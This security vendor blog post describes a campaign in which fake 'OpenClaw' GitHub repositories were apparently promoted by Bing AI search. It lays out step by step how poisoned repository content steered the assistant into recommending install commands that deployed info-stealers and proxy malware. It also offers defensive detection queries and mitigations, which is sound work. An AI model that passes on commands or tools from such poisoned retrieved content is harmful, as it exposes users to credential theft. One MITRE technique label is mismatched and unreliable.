Back to Intelligence

Bing AI Deception: How Malicious GitHub Repos Exploit Search Engines to Deliver Info-Stealers

SA
Security Arsenal Team
March 8, 2026
5 min read

Bing AI Deception: How Malicious GitHub Repos Exploit Search Engines to Deliver Info-Stealers

In the rapidly evolving landscape of generative AI, we often discuss the potential for Large Language Models (LLMs) to hallucinate facts. However, a more dangerous reality is emerging: AI models being manipulated to distribute malicious payloads. Recently, security researchers uncovered a sophisticated campaign where Microsoft's Bing AI (now Copilot) was tricked into promoting a fake "OpenClaw" GitHub repository. This repository wasn't just a prank; it was a vector for information-stealing malware and proxy tools.

The Threat: AI-Powered Search Poisoning

The incident highlights a significant shift in social engineering. Traditionally, attackers relied on phishing emails or malicious ads to lure victims. In this case, they weaponized the trust users place in AI-generated summaries.

Here is how the attack chain unfolded:

  1. SEO Poisoning & Fake Repositories: Attackers created GitHub repositories designed to look like legitimate software projects (in this case, masquerading as the "OpenClaw" security tool). They optimized these repositories with keywords and documentation to appear authoritative.
  2. AI Indexing: Bing's AI-enhanced search crawled these repositories, interpreting the metadata and content as legitimate. The AI then began recommending the repository directly in search results and chat responses as a solution to user queries.
  3. The Hook: Users searching for tools or debugging help were presented with the malicious repo as a "featured" answer, bypassing the skepticism usually applied to standard search results.
  4. Execution: The repository instructed users to run specific shell commands to "install" the software. Instead of a legitimate installation, these commands deployed info-stealers (designed to harvest credentials, cookies, and crypto wallets) and proxy malware (used to route malicious traffic through the victim's IP).

Technical Analysis

Attack Vector: AI Hallucination as a Service

The attackers did not hack Microsoft's infrastructure directly. Instead, they exploited the LLM's reliance on context and relevance. By flooding a repository with convincing-looking Markdown files (READMEs, LICENSEs, and documentation), they created a context that the AI classified as "highly relevant" and "helpful." This is a form of "prompt injection" via SEO, where the context provided to the retrieval system is poisoned.

Malware Capabilities

According to the analysis of the fake installers:

  • Information Stealers: The malware targets sensitive browser data, including saved passwords and autofill data, often bypassing basic browser security measures.
  • Proxy Components: By turning the infected machine into a proxy server, attackers can anonymize their own malicious traffic, making the victim's IP address appear responsible for attacks conducted by the threat actors.

MITRE ATT&CK Mapping

  • T1589.001 (Gather Victim Org Information): Search Engines): Attackers likely used SEO to ensure their repo appeared for specific technical queries.
  • T1204.002 (User Execution: Malicious File): The user executing the "installer" command.
  • T1059.003 (Windows Command Shell): Execution of the malicious payload via cmd/bash.
  • T1056.002 (Input Capture: GUI Input Capture): Stealing credentials and cookies.

Detection and Threat Hunting

Security teams need to monitor for suspicious command-line activity originating from users who might have been misled by AI search results. We should look for patterns where PowerShell or Bash is used to download and execute scripts directly from GitHub without validation.

KQL Query (Microsoft Sentinel/Defender)

Use this query to hunt for processes executing scripts from raw GitHub content, which is a common TTP in these repo-based attacks.

Script / Code
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any("github.com", "raw.githubusercontent.com")
| where (ProcessCommandLine has "Invoke-WebRequest" or ProcessCommandLine has "curl" or ProcessCommandLine has "wget")
| where ProcessCommandLine has "Invoke-Expression" or ProcessCommandLine has "iex"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

PowerShell Script for Host Investigation

This script checks for the presence of suspicious recent downloads or processes associated with common info-stealers and proxy tools that might have been dropped by these fake installers.

Script / Code
# Check for recent PowerShell scripts in the temp directory
$tempPath = $env:TEMP
$threshold = (Get-Date).AddDays(-1)

Write-Host "Checking for suspicious scripts in $tempPath modified in the last 24 hours..." -ForegroundColor Cyan

$suspiciousFiles = Get-ChildItem -Path $tempPath -Filter *.ps1 | Where-Object { $_.LastWriteTime -gt $threshold }

if ($suspiciousFiles) {
    Write-Host "Alert: Found recently modified PowerShell scripts:" -ForegroundColor Red
    $suspiciousFiles | Format-Table Name, LastWriteTime, Length -AutoSize
} else {
    Write-Host "No suspicious scripts found." -ForegroundColor Green
}

# Check for unusual network connections (Proxy Malware check)
Write-Host "Checking for established non-local network connections..." -ForegroundColor Cyan
Get-NetTCPConnection -State Established | 
    Where-Object { $_.RemoteAddress -notmatch "^(127\.|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.)" } | 
    Select-Object OwningProcess, RemoteAddress, RemotePort, State | 
    Format-Table -AutoSize

Mitigation Strategies

To protect your organization from AI-search-based malware distribution:

  1. Validate Before You Execute: Never run terminal commands copied from an AI response or a GitHub README unless you have verified the digital signature of the software or the integrity of the repository owner.
  2. GitHub Allow-listing: If your organization allows access to GitHub, consider implementing allow-list policies for specific repositories or using enterprise GitHub integrations that scan for malware in repositories.
  3. Restrict Script Execution: Enforce ExecutionPolicy restrictions (e.g., RemoteSigned or AllSigned) to prevent unsigned scripts from running.
  4. Network Filtering: Monitor and block connections to known malicious IP addresses and domains often associated with C2 servers used by info-stealers.
  5. User Awareness: Train your development and IT teams that "AI Recommended" does not mean "Safe." AI summaries are prone to manipulation and should be treated with the same suspicion as an unsolicited email.

Conclusion

The incident with the fake OpenClaw repository is a harbinger of future threats. As AI becomes the primary interface for information retrieval, attackers will inevitably pivot to poisoning the well. Vigilance, technical validation, and robust detection engineering are our best defenses against this new wave of AI-generated social engineering.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub

incident-responseransomwareforensicsai-securitymalwaresocial-engineeringthreat-huntinggithub

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.